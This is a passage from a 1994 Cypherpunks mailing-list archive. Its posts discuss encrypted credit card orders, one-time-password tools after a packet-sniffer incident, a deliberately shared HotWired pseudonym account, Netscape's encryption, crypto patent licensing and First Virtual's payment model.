them, and then e-mail that cyphertext file to them for processing. The company could then snail mail to the purchaser confirmation of the cc purchase just like what happens for a credit card phone purchase. It seems straightforward or am I missing something? I mean, PGP is extremely widespread, and other organizations encrypt data for transmission between points with DES, so use of encryption is hardly a novel concept for business to swallow (particularly a magazine like Wired, who likely have a reasonably encryption knowledgeable readership or potential readership). Routine use of encryption at this simple level would likely get the ball rolling in the direction of other endeavors, like e-cash, or at worst become another convenience for the customer and allow encryption and the 'net to gain wider acceptance. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBLu6Cl3BFBj7pSNyhAQGzRQf/WjlkdJaLfTpc8cdDF6EV6IoGN0P0i6l1 dXPMoqRwNn3Aol04pBRQn3+KrK5GaII9ZopRWtEysCzIdv4nbA2t6qLZBZ8oXUgg 3o5Bdp+RIcgXNPtoRmZH5yDGw8kOQqgBH3glWsL25v2BOd87ic10HbhjSZn9FfWD s0qNKFblbqOb6Ur/XZklfjEpPJbE8rvVawt6RQqDO1ky5rKxrgDeGeQVfnu8m7ti fFo9lqTGpBKW9vk8JnTpF5gJvgTcj/iPxNzzeRw6UBD/nIDV2Ttg/lJni5yhGOxe 5LLINeaGVDvtioGbcehz0veXFZ5t7pNJgRxbIIG0AgA+plP0RQdp8A== =iUO3 -----END PGP SIGNATURE----- From cyber1 at io.org Tue Dec 13 21:35:45 1994 From: cyber1 at io.org (Cyber City) Date: Tue, 13 Dec 94 21:35:45 PST Subject: Emergency! Need single use passwords! In-Reply-To: <9412140329.AA27612@nately.UCSD.EDU> Message-ID: On Tue, 13 Dec 1994, Lance Cottrell wrote: > This is my chance to try to get single use password > login programs installed here. Please give me recomendations > and ftp locations. ftp://thumper.bellcore.com/pub/nmh/skey From lcottrell at popmail.ucsd.edu Tue Dec 13 22:11:57 1994 From: lcottrell at popmail.ucsd.edu (Lance Cottrell) Date: Tue, 13 Dec 94 22:11:57 PST Subject: Emergency! Need single use passwords! Message-ID: -----BEGIN PGP SIGNED MESSAGE----- >| Hi all. We discovered that someone has been >| running a packet sniffer on our subnet of several >| dozen computers. He has all the passwords. >| This is my chance to try to get single use password >| login programs installed here. Please give me recomendations >| and ftp locations. > > S/Key is a very nice software only solution (no smart cards). >It has clients for Mac, PC, Unix, and supports paper lists as well. >Can be configured to only be invoked if the connection is from outside >your net. ftp.win.tue.nl:/pub/security/logdaemon.tar.Z > > In quick reply to Derek's suggestion of Kerberos, I will point >out that Kerberos does not deal well with remote users. As far as I >know, you need a special connection mechanisim or your password will >travel in the clear to the boundary of your keberized network. (There >is Kerberos support for S/key, there may be telnet programs. There is >no paper list or palmtop support.) > >Adam > > If you're interested, I can mail you the intro to S/Key sent >to our user community. It covers S/key and PGP, since we have users >all over the globe. > >-- >"It is seldom that liberty of any kind is lost all at once." > -Hume Wonderful, thanks. That is exactly what I was looking for. I forgot the name of the program. BTW, remailer at nately and mixmaster at nately will be down till tomorrow morning because we yanked the thicknet connection out of our Ethernet repeater. Lets see a hacker get through THAT security ;) No messages will be lost. They should be back up around 11:00 AM PST tomorrow. To spare you other remailer operators out there a flood of messages, I turned off my pinging scripts ;) -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBLu6LblVkk3dax7hlAQHq6gP+NnwclSRJ9b9G5qV9qsfE/1MH0o+K+vcq 2JNRgPgPhdo9CrBO+c65KnVXXse8k6wiAY2vcwJdN/01c4SmqoHnrAU0n7Zpoyxx v3uilFCBIOLw4jtwBPq8ipspYDJior5q86Shhc1Cy66iPyU67DOiXMDssucBGLaU w3rgkImkCHU= =jZ6r -----END PGP SIGNATURE----- -------------------------------------------------- Lance Cottrell who does not speak for CASS/UCSD loki at nately.ucsd.edu PGP 2.6 key available by finger or server. Encrypted mail welcome. Home page http://nately.ucsd.edu/~loki/ Home of "chain" the remailer chaining script. For anon remailer info, mail remailer at nately.ucsd.edu Subject: remailer-help "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche From lmccarth at ducie.cs.umass.edu Tue Dec 13 22:29:46 1994 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Tue, 13 Dec 94 22:29:46 PST Subject: Encrypted Credit Card Numbers For Transmission.... In-Reply-To: Message-ID: <199412140630.BAA28049@ducie.cs.umass.edu> -----BEGIN PGP SIGNED MESSAGE----- Mark Terka writes: > Why don't organizations like Wired (who are ostensibly closely connected to > the 'net) not have public keys (ie through Viacrypt, as they are a commercial > enterprise) that subscription purchasers could encrypt a credit card number > to them, and then e-mail that cyphertext file to them for processing. Some do; see for example http://northpole.net/buttons.html (as noted by Hal Finney previously). > [...] use of encryption is hardly a novel concept for business > to swallow (particularly a magazine like Wired, who likely have a reasonably > encryption knowledgeable readership or potential readership). Wired is tired. Someone should call them on this. Incidentally, I just tried to get into HotWired using the "cypherpunks"/ "cypherpunks" combo I recommended to Amanda earlier this evening. It didn't work. I'm just about to re-register cypherpunks on it, so don't be surprised to see a verification key sent to the list soon. I'll summarize to the list once the new membership seems ready to go. - -L. Futplex McCarthy "Your registration [...] encourages responsible behavior and good citizenship by discouraging anonymity." --Hotwired, on http://www.hotwired.com/newform.html -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLu6Q9Gf7YYibNzjpAQFHswQA38F5Ky8pus0EYJfo7pi/+w+rfTMpXlY/ BIPUL49HQjsLYlKgOkgbsUZYdyHFyqvikqFHDbLuZiuLigsRjmlWc1BJPCSEdHML tEyPaw8rgwjVaJOP1Y16LW25lkcCn4sXVVxFlpFsjfSKF6peOcAteXFXJ5Y2kpK8 QCmu4pJZpbg= =uaT5 -----END PGP SIGNATURE----- From newaccounts at wired.com Tue Dec 13 22:31:45 1994 From: newaccounts at wired.com (newaccounts at wired.com) Date: Tue, 13 Dec 94 22:31:45 PST Subject: Welcome to HotWired! Message-ID: <199412140636.BAA14207@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Welcome to HotWired! ++++++++++++++++++++ The verification number for "cypherpunks" is: 96472 You may also use the following URL to verify yourself, using cut and paste if you can: http://hard.wired.com/cgi-bin/users/ver?number=96472 Note: This is your *verification* number, *not* your HotWired password. Your HotWired password is the password you gave us when you created your account, and has not changed (and won't change unless you change it). Please type (or copy and paste) this number into the verification form. To reach the verification form, connect to HotWired, click Yes to signify that you are a member, and click on the region of the image map that reads, "You should verify NOW." (You really should.) You can also reach this directly as http://www.hotwired.com/Login/verify.html You will then be able to take advantage of the full range of HotWired services. Thanks! - ---------------------------------------------------------------------- HotWired FAQ What Is HotWired? HotWired is new thinking for a new medium. We call it a cyberstation, a suite of vertical content streams about the Digital Revolution and the Second Renaissance with an integrated community space. While HotWired is currently bound by technological limitations that restrict bandwidth, it represents the genetic blueprint that will evolve into the overarching media environment of the next century. At the core of HotWired's editorial is point of view. We are not in the content business, we are in the context business. People today don't have the time or inclination to make sense of the data flood. HotWired is Wired's answer to the need for professionalism in a new medium that has been filled until now with something that resembles public access television programming. HotWired is live, twitching, the real-time nervous system of the planet. What Does HotWired Look Like? HotWired is a stunning reinterpretation of the World Wide Web. Developed by Creative Director Barbara Kuhr of the award-winning design firm Plunkett + Kuhr, HotWired's look is clean and bright, filled with playful logos by Dutch designer Max Kisman and bursting with world-beat colors. HotWired can be accessed on the Internet via the World Wide Web and a client application such as Mosaic or NetScape (though be warned, NCSA Mosaic for Windows has a bug which makes it unusable). How Is HotWired Different? HotWired doesn't look like any online service out there - it zigs where all the others zag. (HotWired's unofficial design watchword was "war on bevelled edges.") Its content and perspective are as innovative as those of its mothership, Wired magazine, while at the same time being utterly different. Its community space is technologically unrivalled - the first graphical conferencing system for the World Wide Web. Isn't Advertising Anathema on the Net? The Net community does indeed react negatively to invasive advertising - the kind of spamming conducted recently by the Arizona lawyers Canter and Siegel, which elicited a massive rejection by the Net's immune system. The advertising on HotWired is the opposite of invasive. Each advertiser is accessible only through a single discreet banner at the head of a content section. Most advertising is 90 percent persuasion and 10 percent information; advertising on HotWired reverses this ratio. And the privacy of members is guaranteed by HotWired's unqualified commitment to never divulge a member's personal information to advertisers. Why HotWired, Why Now? Because while Big Media and the telecom behemoths have been busy forming "strategic alliances" to build the "information superhighway" and sending out press releases about the tests they're launching any day now, thousands of companies and millions of people have quietly built a new interactive medium called the Internet. This medium is not magazines with buttons, any more than television was radio with pictures. It's a new medium with a new aesthetic, a new commercial dynamic. Many media companies shovel their leftovers into the online world and call it content. HotWired is not one of them. Where Wired is a clear signpost to the next level, HotWired is operating from that next level. HotWired is a constantly evolving experiment in virtual community. It's Way New Journalism. It's Rational Geographic. Today is like 1948; a new medium has reached critical mass. We're trying to help define the future of that medium before it ends up like television. So if you're looking for the soul of our new medium in wild metamorphosis, our advice is simple. Get HotWired. What Does HotWired Cost? HotWired is free to members. HotWired's revenue model is similar to broadcast media - content supported by sponsors. HotWired's sponsors are some of the bluest chip advertisers in America, including IBM, AT&T, Volvo, Sprint, MCI, Zima (Coors), Internet Shopping Network (Home Shopping Network), Club Med, etc. What Hotwired Is Not HotWired is not Wired magazine with another name (Wired works perfectly well in print, thank you). It's not a so-called online magazine (print content reduced to ASCII and shoveled into another medium, narrowband interactive). It's not video-on-demand (a pie-in-the-sky marketing concept created by out-of-touch old-media executives to justify their headlong rush into a new medium they don't understand, broadband interactive). It's not an online service like Prodigy or AOL (now rendered obsolete by the explosion of interest in the Internet and the development of the Web and graphical browsers). And like Wired before it, HotWired is not a cold, marketing concept, but the heartfelt expression of the passion of its creators. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLu6SbCoZzwIn1bdtAQHuEwGA3eIONz/osE9684/lB2U8qXM+e2NxJhYw nQCC0yOux4zkXVvIfGMnlmP4SaTIQvNy =n77t -----END PGP SIGNATURE----- From lmccarth at ducie.cs.umass.edu Tue Dec 13 22:54:32 1994 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Tue, 13 Dec 94 22:54:32 PST Subject: C'punks HotWired Account In-Reply-To: <199412140636.BAA14207@bb.hks.net> Message-ID: <199412140655.BAA28147@ducie.cs.umass.edu> -----BEGIN PGP SIGNED MESSAGE----- newaccounts at wired.com writes: > Welcome to HotWired! > ++++++++++++++++++++ > The verification number for "cypherpunks" is: 96472 I have successfully verified this registration with the HotWired server. To access HotWired, you can use username: cypherpunks password: cypherpunks Enjoy ! > [...] bursting with world-beat colors. What are world-beat colors, and how can I get them on my monochrome monitor ? - -L. Futplex McCarthy; PGP key by finger or server "We've got computers, we're tapping phone lines; I know that that ain't allowed" --Talking Heads -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLu6WHGf7YYibNzjpAQEqowP/e4B19zn7GTEe0Y2yGw5unSZcgt/UFCOF VehFKe83Px78ngH2D4aITZ+zEj//IM6M82LPHK8ufISwieVEnptpCxpHq/FRI1oO mMHxxH2eilQ2DmjWHOQ/d0fMivs7ZDnkWgufaPeN6w+yN04fMwUPGPmEaichqnUI 4a8QIdbbr0I= =k/zM -----END PGP SIGNATURE----- From hfinney at shell.portal.com Tue Dec 13 22:58:42 1994 From: hfinney at shell.portal.com (Hal) Date: Tue, 13 Dec 94 22:58:42 PST Subject: Encrypted Credit Card Numbers For Transmission.... Message-ID: <199412140658.WAA18184@jobe.shell.portal.com> From: "L. McCarthy" > Incidentally, I just tried to get into HotWired using the "cypherpunks"/ > "cypherpunks" combo I recommended to Amanda earlier this evening. It didn't > work. I'm just about to re-register cypherpunks on it, so don't be surprised > to see a verification key sent to the list soon. I'll summarize to the list > once the new membership seems ready to go. It was "cypherpunk"/"cypherpunk", no "s". But that's OK, it doesn't hurt to have both. Hal From sdw at lig.net Tue Dec 13 23:35:30 1994 From: sdw at lig.net (Stephen D. Williams) Date: Tue, 13 Dec 94 23:35:30 PST Subject: BofA + Netscape In-Reply-To: <9412131845.AA12626@snark.imsi.com> Message-ID: ... > Imagine if someone proposed Bass-O-Matic today, however. Well, we have > better technologies than SSL today -- IMPLEMENTED AND AVAILABLE -- so > they aren't pioneering -- they are going retrograde. > > Perry It's too bad that Mosaic used Motif. If it hadn't I think we would have seen continued development by the rest of the community. I'm going to make a point to see how far the tcl/tk folks got with their www browser and see if pgp could be grafted onto it. (Or something along those lines.) Any interested collaborators? Note that part of the reason I'm interested is that it looked like there would eventually be a Windows tk version, which would be fantastic. (Just looked: there is a version available for windows, but not sure if winsock support is there yet. Also, lots of widgets would need to be included in the executable to make it feasible.) Is there an obvious reason that pgp's normal message encoding method couldn't be used as the encryption/authentication technique? sdw -- Stephen D. Williams 25Feb1965 VW,OH sdw at lig.net http://www.lig.net/~sdw Senior Consultant 510.503.9227 CA Page 513.496.5223 OH Page BA Aug94-Dec95 OO R&D AI:NN/ES crypto By Buggy: 2464 Rosina Dr., Miamisburg, OH 45342-6430 Firewalls/WWW servers ICBM: 39 38 34N 84 17 12W home, 37 58 41N 122 01 48W work Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.29Nov94 From pierre at shell.portal.com Wed Dec 14 01:35:45 1994 From: pierre at shell.portal.com (Pierre Uszynski) Date: Wed, 14 Dec 94 01:35:45 PST Subject: expendable computer sites Message-ID: <199412140935.BAA26307@jobe.shell.portal.com> Related to our earlier discussions about expendable computer sites: A quote from the article: The Ghost Board, by Autolycus, in 2600, v10, n3, autumn 1994, p11 "For a short period of time in the early 90's, one Ghost Board pioneer abandonned an AT (he'd purchased it for $40 at the Goodwill) on the roof of a rural supermarket. The AT was water-protected and hardwired into the store's power grid and the 2400 modem was spliced into the store's phone lines. This system operated for almost five months before it was (apparently) detected and shut down." (The rest of the article is anecdotes about hiding BBS's inside other BBS's.) Pierre. pierre at shell.portal.com From an107744 at anon.penet.fi Wed Dec 14 04:10:57 1994 From: an107744 at anon.penet.fi (Big Lama) Date: Wed, 14 Dec 94 04:10:57 PST Subject: News->Mail & CMU's Andrew Message System Message-ID: <9412141142.AA29687@anon.penet.fi> > > AMS is pretty strongly tied to AFS (now known as part of DCE) > > At some levels DCE's distributed file system (DFS) is "AFS version 5" (sic), > but not really. The original intent was that DFS was AFS with the IPC replaed > with secure DCE RPC, but there's a whole mess of protocol changes since then. A, B, C and D and E and AMS and AFS and DCE and DFS and IPC and RPC and MDA and STP and LSD and THC... ...and amphetamine. Big Lama (remembering an old hit, from the Flower Power period) ------------------------------------------------------------------------- To find out more about the anon service, send mail to help at anon.penet.fi. Due to the double-blind, any mail replies to this message will be anonymized, and an anonymous id will be allocated automatically. You have been warned. Please report any problems, inappropriate use etc. to admin at anon.penet.fi. From snyderra at dunx1.ocs.drexel.edu Wed Dec 14 04:17:33 1994 From: snyderra at dunx1.ocs.drexel.edu (Bob Snyder) Date: Wed, 14 Dec 94 04:17:33 PST Subject: THROUGH THE LOOKING GLASS Message-ID: -----BEGIN PGP SIGNED MESSAGE----- At 8:44 AM 12/13/94, Sandy Sandfort wrote: >Police are public officials. As such, they have no right to >privacy *with respect to their public acts*. When off duty, cops >have the same right as other citizens to privacy in their private >lives. I said my proposal was "anti- *bad* cop" and that it >would benefit good cops. Do I need to say that it would only >benefit good cops in the line of duty? It would be bad for >anyone--cops or civilians--in their private lives. > >Employees represent an intermediate position. If an employer is >foolish enough to require that employees be wired, 'sokay with >me. For most employees in most jobs, it would not be acceptable. >I think they would get jobs with less intrusive employers. Some >employers will wire some employees, whether or not the police are >wired. Wiring the cops is a good idea; arguments about wiring >employees and citizens are nothing more than red herrings used to >avoid addressing the real issue of police accountability. Arguably discussions about police abuses are red herrings used to avoid addressing the real issue of workplace monitoring. :-) I really don't want to know how many sips it takes an officer to finish a cup of coffee, or if the officer has a genital itch problem while sitting in a speed trap. I think this crosses the line. And where do we stop? Do we wire other federal employees? Does the secretary for a research group in the FDA need to be wired? It would be a short jump from this to private sector use, which I do oppose. Not everyone has the ability to pick and choose employment. This has wandered a bit off of Cryptological relevence. I don't plan to reply publically to this thread anymore, although I may do so privately. Bob -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBLu7d0+S0CjsjWS0VAQGa+AP/YSoE66T9JsCFfKUp3spkqhhALYrEF42F SrfApj4YrNRCNHyfV60IOFQem0KZWee6FgzUQHRWjVpFy1Wz3HDZ/vpokCxwTdFi xqG3VbxXgFHm3eQZUTrKueCN5S+P3FkCccHpiz5zlx84619E6u9qH8Ckfak2DBG6 WFJcz4WkUrY= =BxtG -----END PGP SIGNATURE----- -- Bob Snyder N2KGO MIME, PGP, RIPEM mail accepted snyderra at post.drexel.edu PGP & RIPEM keys on key servers When cryptography is outlawed, bayl bhgynjf jvyy unir cevinpl. From snyderra at dunx1.ocs.drexel.edu Wed Dec 14 04:17:39 1994 From: snyderra at dunx1.ocs.drexel.edu (Bob Snyder) Date: Wed, 14 Dec 94 04:17:39 PST Subject: BofA+Netscape Message-ID: -----BEGIN PGP SIGNED MESSAGE----- At 4:18 PM 12/13/94, Jim McCoy wrote: >> The plug for crypto that they have placed in Netscape 0.96 is >> the number one force bringing crypto awareness to the masses. > >Increasing use of PGP is the number one force bringing crypto awareness to >the masses, Netscape is just bringing bad crypto to the masses. No. I could see the argument that PGP is bringing crypto to the masses. I can't see it bring crypto-awareness to the masses. In order to find and use PGP, you have to already be concern about privacy and cryptography. Netscape, on the other hand, by popping up the alert that this traffic isn't being encrypted, and may be evesdropped, is and will get the common folk to think about data security and confidentiality. A lot more people will probably use Netscape than PGP, and the people who use Netscape are the people to whom the wonders of encryption need to be shown. As to whether Netscape's crypto is good or bad, I'll leave that to the chest-pounding "IETF is life. IPSP should be all you need to be happy" folk. Personally, I'd prefer a standards based scheme, and it looks like the NCC folk are looking that way, despited the unwarranted abuse they are getting. >No, the correct response is to stop idotic measures before the build up >enough inertia behind them to make it difficult to prevent mistakes from >being made. It is interesting that the creators of Netscape quite >frequently harp on "it is us against the goliath of Microsoft, so we >deserve the support of the net" and then they go out and do exactly the >sort of thing that makes Microsoft so unpopular; they take advantage of >thier market position to force bad technology on others. They've said they are investigating it. They are here, and they are listening, and looking into it. What do you want of them? Bob -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBLu7gyOS0CjsjWS0VAQGaiQP8CS+uIuxJRQFfP0HW7rrIe15EYvDC19Ry wLtDVoQYl/qeOWo8HyAG/bQ0n4WoHI0QP3a/wafI3fhTF0QBCHROPkVcpUcb0U5T lHGkFhR9+mS+A1hRL5ESKp5L8AYOH9x3r9RWxXDgvdRnWA0vVxEG1oiOiXW7t+Vj yYAJ7JNXEAc= =eKvE -----END PGP SIGNATURE----- -- Bob Snyder N2KGO MIME, PGP, RIPEM mail accepted snyderra at post.drexel.edu PGP & RIPEM keys on key servers When cryptography is outlawed, bayl bhgynjf jvyy unir cevinpl. From snyderra at dunx1.ocs.drexel.edu Wed Dec 14 04:18:38 1994 From: snyderra at dunx1.ocs.drexel.edu (Bob Snyder) Date: Wed, 14 Dec 94 04:18:38 PST Subject: Emergency! Need single use passwords! Message-ID: -----BEGIN PGP SIGNED MESSAGE----- At 7:29 PM 12/13/94, Lance Cottrell wrote: >Hi all. We discovered that someone has been >running a packet sniffer on our subnet of several >dozen computers. He has all the passwords. >This is my chance to try to get single use password >login programs installed here. Please give me recomendations >and ftp locations. You might also want to check out the firewall toolkit, which contains parts to secure a system, including special shells that work with S/Key or SecureNet Key hardware keys (use DES challenge/response). ftp.tis.com. Bob -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBLu7b4+S0CjsjWS0VAQFxPQQAiORDyVVIYwHYn5uffd26gapjyZU6P1ir +RUinyZYFjhgOSUVh4op9AOJN33Buey6o5xdy75cxbmppnX44ZwnJpg+b3/r+u85 pIZDIP1dNiKa3gHjHFrHc6l1oDExcPdcIDGtre8mpNPqUWexWSi9ltpdAN+43GB3 r3R9xLXaQIw= =0cS1 -----END PGP SIGNATURE----- -- Bob Snyder N2KGO MIME, PGP, RIPEM mail accepted snyderra at post.drexel.edu PGP & RIPEM keys on key servers When cryptography is outlawed, bayl bhgynjf jvyy unir cevinpl. From zimm at alumni.caltech.edu Wed Dec 14 04:50:53 1994 From: zimm at alumni.caltech.edu (Mark Edward Zimmerman) Date: Wed, 14 Dec 94 04:50:53 PST Subject: Articles on Adelman and E=mc(2) In-Reply-To: <199412131550.KAA23154@pipe3.pipeline.com> Message-ID: <199412141250.EAA13389@alumni.caltech.edu> re Hal Puthoff et al.'s "unconventional" theories on the nature of matter, tnx for pointer to article, but a caveat: they are very probably wrong, as are virtually all such attempts to overturn big chunks of physics. Does the article mention that Hal is most famous for his SRI work on remote viewing & spoonbender/magician Uri Geller some years ago? That doesn't disprove his current notions (and I've tried to read some of his technical papers, which he occasionally gets published in mainstream peer-reviewed physics journals, but I don't have the time or talent to poke holes in them; my Ph.D. is in astrophysics and general relativity) but perhaps raises some questions, if you're a skeptic by nature.... To give this msg a wee bit of crypto content, any news on the "quantum cryptography" front? Although that subject does seem to me to be legitimate physics, my current perception is that it's almost entirely an intellectual exercise, and that the proposed applications (key-distribution or the like) are contrived examples without plausible real-world use (and with many security holes to boot). Am I wrong? Best, ^z (Mark "no relation" Zimmermann) From avi at clas.ufl.edu Wed Dec 14 05:58:40 1994 From: avi at clas.ufl.edu (Avi Harris Baumstein) Date: Wed, 14 Dec 94 05:58:40 PST Subject: Using HotWIRED without provoking junk mail In-Reply-To: <199412140456.XAA12500@bb.hks.net> Message-ID: <199412141358.IAA28880@cutter.clas.ufl.edu> "L. McCarthy" writes: >A while back someone established a HotWIRED account in the name "cypherpunks" >with password "cypherpunks" to get around this. I make a point of mentioning funny thing about that. i told a non-cp friend about this when he first discovered hotwired's policy. he used it for a while, and then somehow mentioned it on another list (something to do with publishing), in a discussion with one of wired's folk. she (wired person) later made the comment that she looked it up, and halfway through that day there were over 100 hits to that account already. tells us three things: -at least this wired staffer was somewhat amused with the prospect (rather than annoyed, as i had expected). -they have a fairly simple way of checking up on usage, by account, by day. which means they are probably using this data for something already. -the account is well used. -avi From avi at clas.ufl.edu Wed Dec 14 06:09:15 1994 From: avi at clas.ufl.edu (Avi Harris Baumstein) Date: Wed, 14 Dec 94 06:09:15 PST Subject: Encrypted Credit Card Numbers For Transmission.... In-Reply-To: <199412140630.BAA28049@ducie.cs.umass.edu> Message-ID: <199412141409.JAA29088@cutter.clas.ufl.edu> "L. McCarthy" writes: >Incidentally, I just tried to get into HotWired using the "cypherpunks"/ >"cypherpunks" combo I recommended to Amanda earlier this evening. It didn't >work. I'm just about to re-register cypherpunks on it, so don't be surprised the account i have been using all along is 'cypherpunk' / 'cypherpunk'. still works. i made the mistake of trying 'cypherpunks' a few times until i went back and read my mail. but since it's such a natural mistake, i doubt having both is any detriment. -avi From a.brown at nexor.co.uk Wed Dec 14 06:11:39 1994 From: a.brown at nexor.co.uk (Andy Brown) Date: Wed, 14 Dec 94 06:11:39 PST Subject: Legal implications of a PGP DLL In-Reply-To: <9412140032.AA25902@homer.spry.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Tue, 13 Dec 1994 bshantz at spry.com wrote: > I know this has been hashed over recently, but I never found out (or don't > remember) what was decided in regards to the legal implications of a PGP > functional DLL for Windows. If a company (i.e. SPRY, wink, wink, nudge, > nudge.) were to write a PGP DLL and make it publicly available, would that be > legal? Can't see any reason why not. The PGP code is freely redistributable, it's what the recipients do with the patented parts of it that will matter. e.g. use of the IDEA code in a commercial environment will require the users to obtain a licence. - - Andy +-------------------------------------------------------------------------+ | Andrew Brown Internet Telephone +44 115 952 0585 | | PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A C0 1F 9F 66 64 02 4C 88 | +-------------------------------------------------------------------------+ -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBFAwUBLu785r7jCNwZnGvhAQGhFQGAoQ4bwedaO27TvmW5KQ6muZ3ftOMqAIqi Stdloip3qZqXjHMU9zccvkxTIch7OaKI =bsJJ -----END PGP SIGNATURE----- From eric at remailer.net Wed Dec 14 06:41:38 1994 From: eric at remailer.net (Eric Hughes) Date: Wed, 14 Dec 94 06:41:38 PST Subject: Legal implications of a PGP DLL In-Reply-To: <9412140032.AA25902@homer.spry.com> Message-ID: <199412141539.HAA04071@largo.remailer.net> From: bshantz at spry.com [..] I never found out [...] what was decided in regards to the legal implications of a PGP functional DLL for Windows. If a PGP DLL were rewritten from scratch and placed in the public domain the only concern would be patent licensure. By rewriting, you've removed any sort of copyright issue. The only was you'd get an RSA license is to use RSAREF. That means that use of the DLL would be restricted to non-commercial use. You'd also need an IDEA license, but I suspect that if you're just doing something PGP compatible you'd be able to obtain that, especially since it would be non-commercial because of RSAREF. If you need commercial accessibility, you'd need licenses from RSADSI and Ascom-Tech. You could then give the DLL away, but RSADSI wants minimum royalties, so you'd be subsidizing the public. I don't know the situation with Ascom. Eric From eric at remailer.net Wed Dec 14 06:55:21 1994 From: eric at remailer.net (Eric Hughes) Date: Wed, 14 Dec 94 06:55:21 PST Subject: Elliptic crypto is patented In-Reply-To: Message-ID: <199412141552.HAA04089@largo.remailer.net> From: rishab at dxm.ernet.in Incidentally Next Computer's Fast Elliptic Encryption, FEE, used elliptic curves, and is patented (by R E Crandell, USP# 5,159,632,27 October 1992); Does anybody have a copy of this to see exactly what is claimed? elliptic crypto is probably covered by the DH/PKP patents. If you believe RSADSI it is. Now, are they going to say otherwise? The fact of the matter is, you can't patent ideas, nor general characteristics of devices. You can patent particular processes or mechanisms for particular purposes. If you come up with a different process or mechanism, the patent does not cover it. If you come up with a different purpose (!), the patent does not hold. The limitation to this difference is the doctrine of extension. A patent covers not only the particular thing patented but also things substantially similar to it. This is to prevent trivial changes from remaining unprotected. Another, less relevant, protection is given to inclusion. If a device includes a patented mechanism, then the patent is required to practice the device, even if the larger device is also patented. Ciphers typically do not include other specific ciphers wholesale, so this doesn't typically apply. One big exception is the blind signature, which does use specifics of RSA. This may be one of the issues with respect to restricted availability of the ecash trial in the USA. In my opinion, RSADSI is claiming far too much for their patent portfolio. In particular, claiming "all public key" is just hogwash. Elliptic curve cryptosystems certainly use a different enough mechanism not to fall under extension. El Gamal is a completely new mechanism; if RSADSI wants to claim that modular exponentiation for crypto is covered, they'll have a hard time actually arguing that one. Eric From eric at remailer.net Wed Dec 14 06:57:54 1994 From: eric at remailer.net (Eric Hughes) Date: Wed, 14 Dec 94 06:57:54 PST Subject: It works. In-Reply-To: Message-ID: <199412141555.HAA04095@largo.remailer.net> From: storm at marlin.ssnet.com (Don Melvin) Funny thing is, last night I actually had a valid reason to send something that I wanted to make sure didn't get read along the way ($ involved). I had all the pieces, they were in place, they worked. And due to time constraints, I wouldn't have been able to do it, if everything hadn't been ready. So, thanks Eric. You're welcome. Your story underlines one of the main reasons to set up personal crypto sooner rather than later. When later comes, it may be too late. Eric From eric at remailer.net Wed Dec 14 07:05:56 1994 From: eric at remailer.net (Eric Hughes) Date: Wed, 14 Dec 94 07:05:56 PST Subject: Legal implications of a PGP DLL In-Reply-To: <199412141539.HAA04071@largo.remailer.net> Message-ID: <199412141603.IAA04124@largo.remailer.net> From: eric at remailer.net (Eric Hughes) The only was you'd get an RSA license is to use RSAREF. That means Excuse me. "The only way you'd get a _free_ RSA license ..." Eric From eric at remailer.net Wed Dec 14 07:08:56 1994 From: eric at remailer.net (Eric Hughes) Date: Wed, 14 Dec 94 07:08:56 PST Subject: Using HotWIRED without provoking junk mail In-Reply-To: <199412141358.IAA28880@cutter.clas.ufl.edu> Message-ID: <199412141606.IAA04130@largo.remailer.net> From: Avi Harris Baumstein -at least this wired staffer was somewhat amused with the prospect (rather than annoyed, as i had expected). I ran into one of the Hotwired guys at a couple of weeks ago. Not only didn't he mind particularly, he thought it most appropriate that the general purpose pseudonym account was called 'cypherpunk'. -the account is well used. In fact, the 'cypherpunk' is by far and away the No. 1 user of Hotwired. Maybe 'cypherpunks' will become number No. 2. Eric From eric at remailer.net Wed Dec 14 07:46:26 1994 From: eric at remailer.net (Eric Hughes) Date: Wed, 14 Dec 94 07:46:26 PST Subject: properties of FV In-Reply-To: Message-ID: <199412141644.IAA04167@largo.remailer.net> From: nsb at nsb.fv.com Wrong. A First Virtual transaction takes place as a single step via mail, FTP, or WWW. *After* the transaction there is an email exchange to confirm the purchase [...] If this email exchange is necessary and not merely advisory, then it's part of the transaction, unless you have a far different notion of transaction than I do. This depends on your definition of anonymity. There are two forms of anonymity: counterparty anonymity and issuer anonymity. FV claims the first but not the second. "Far from anonymous" may be a little confusing, but it's certainly far from completely anonymous. I think this meets most practical standards for anonymity, [...] That depends on your standards, I suppose. It's certainly not sufficient for anonymous mail with digital postage. > and its minimum transaction cost > is high enough to rule out its applicability for very small > transactions. Wrong again. We explicitly permit seller-based accumulation, [...] Net clearing of this form requires the creation of an entire billing system for small value which then settles through FV. The very nature of such a net billing system requires linkability of transaction to transaction, or in other words generates identity. So FV is unsuitable for small value anonymous transactions. We expect to make our money on information products, not on the commerce engine. At 29 cents plus 4% per settlement transaction, I find this comment disingenuous in the extreme, even after paying Visa for settlement. > it seems odd to build a unconditional rejection into > the payment system, especially for products that can't be > returned in any meaningful sense. Of course it can be done without bundling it into the payment protocol. But, I suspect, it can't be done if you want to piggyback on Visa's settlement system. By "bundling" it into the payment protocol, we have been able to achieve a vast SIMPLIFICATION of the payment protocol. You haven't simplified the protocol, you've simplified your business model. It is not a coincidence that we are the first (and so far, still the only) system that is operational with real money. I question "first". Certainly one of the first. In any case,, it isn't a coincidence that you were able to start up quickly, because you didn't build a settlement system for real value but rather used someone else's. [... earlier in the post ...] (And FYI, we know whereof we speak: we use cryptography heavily internally, and we are extremely aware both of its power and utility AND of the practical difficulties in its use.) [... then later ...] The email 